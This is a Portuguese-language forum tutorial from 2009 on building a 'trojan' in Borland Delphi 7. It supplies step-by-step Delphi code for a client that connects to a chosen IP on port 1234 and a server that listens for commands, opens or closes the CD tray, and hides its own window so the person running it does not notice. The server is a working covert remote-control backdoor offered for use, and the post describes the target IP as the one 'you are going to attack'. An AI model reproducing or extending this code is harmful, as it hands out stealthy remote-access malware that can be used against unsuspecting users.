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 Criando um trojan com Borland Delphi 7

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MensagemAssunto: Criando um trojan com Borland Delphi 7   Seg Nov 30, 2009 6:21 am

1º Passo -> Você tem o Delphi? Se não, será necessário baixá-lo.

2º Passo -> Abra o Delphi. Clique em Component, depois em vá
em Install Packages…

Depois cliques em Add...

Em Filename coloque isso e depois clique em Open:

%programfiles%\Borland\Delphi7\Bin\dclsockets70.bpl

Ou o diretório do seu delphi + \Bin\dclsockets70.bpl. Isso serve para adicionar os componentes que serão necessarios para seu Trojan…

3º Passo -> Agora mãos a obra! Vá na paleta Standard e adicione 4 Buttons

Agora… insira um Edit que está na paleta Standard também:

Depois insira um ClientSocket que está na paleta Internet:

Clique em um dos botões, e na parte esquerda, procure pela janela que o titulo é Object Inspector e depois procure por Caption:

E altere o conteudo da sua direita para Conectar, repita isso com os outros três botões, só que ao invés de colocar Conectar, coloque: Desconectar, Abrir CD e Fechar CD.

Agora clique no Edit e vá na mesma janela anterior, só que dessa vez procure por Text. E remove o conteúdo da
direita.

De uma arrumada na posição dos objetos a seu gosto… E lembresse, o Client Socket não vai aparecer… Eu arrumei assim:

4º Passo -> Agora que já fizemos a interface do Cliente, vamos codar! De dois cliques no botão Conectar. Abrirá uma nova janela, nela… escreva abaixo de begin isso:

ClientSocket1.Host := Edit1.Text;
ClientSocket1.Port := 1234;
ClientSocket1.Active := True;

Explicando, a primeira linha vai definir o IP que você vai atacar, como o texto do edit que você inseriu, a segunda
linha, vai definir como a porta a ser aberta, como 1234, e a terceira se conectará. Agora vá a janela anterior e de dois cliques no botão Desconectar, e coloque isso:

ClientSocket1.Active := False;
ClientSocket1.Close;

Explicando, a primeira linha vai desconectar o Cliente do servidor, e a segunda vai fechar o cliente.
Volte a janela anterior e dê dois cliques no botão Abrir CD, e coloque isso:

ClientSocket1.Socket.SendText(’1');

Explicando, essa linha fará com que o Client Socket, envie o texto com o número 1 para o servidor, e lá, esse texto será reconhecido. Volte novante a janela anterior, dê dois cliques no botão Fechar CD, e coloque isso:

ClientSocket1.Socket.SendText(’2');

Explicando, ele faz a mesma coisa que o comando anterior, só que, ao invés de mandar um texto com o número 1 ele vai mandar um texto com o número 2. Pronto cliente terminado,agora só falta o Server, então salve o programa clicando em File, depois em "Save all" e salve onde quiser.

Depois que salvar clique em Project depois Compile Project1 :

Depois clique em File, depois Close All :

Clique em File, depois New, depois Application :


Vá na paleta Internet e de dois cliques em ServerSocket :

Agora de um clique nele, e vá na janela Object Inspector, e mude a Port para 1234

Agora, ainda na Object Inspector, mude o Active para True :

Novamente em Object Inspector, clique em Events :

Depois de dois cliques em OnClientRead :

Na nova janela que apareceu, apague o begin e coloque isso:

var
Kingcaio : String;
begin
Kingcaio := Socket.ReceiveText;
if Kingcaio = ‘1' then
MciSendString(’Set CdAudio Door Open’,nil,0,Handle)
else if Kingcaio = ‘2' then
MciSendString(’Set CdAudio Door Closed’,nil,0,Handle);

Explicando, a 2ª linha vai definir a variante Kingcaio como uma string, a 4ª define a String Kingcaio como sendo igual a Socket.
ReceiveText, que por sua vez significa ao texto recebido, a 5ª vai dizer tipo assim: “Se o texto recebido for igual a 1 faça isso, mas se não for siga em frente”, a 6ª é o comando para abrir o CD-ROM, a 7ª linha tem a mesma função que a 5ª linha, e por final a 8ª linha, é o comando para fechar o CD ROM.

Agora, ainda nessa janela suba a barra de rolagem até achar alguma coisa assim:

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ScktComp;

Logo após de ScktComp coloque MMSystem ficando igual a seguinte foto:

Certo, clique em Project depois em View Source, aparecerá uma nova janela, procure por Application.Initialize;, escreva logo abaixo dessa linha isto:

Application.ShowMainForm := False;

Que servirá para que a pessoa não veja a janela.


Agora clique em File e depois em Save All e salve em qualquer lugar.

Logo em seguida clique em Project em seguida Compile Project1.

Pronto! Acabou! Agora vamos testar para ver se deu certo! Dê dois cliques no executável do server, depois no executavel do cliente, no edit que você inseriu coloque isso:

127.0.0.1

Que é o endereço de LoopBack, ou seja, é a mesma coisa que se você digitasse seu próprio IP, e logo em seguida clique em Conectar, e teste os comandos.
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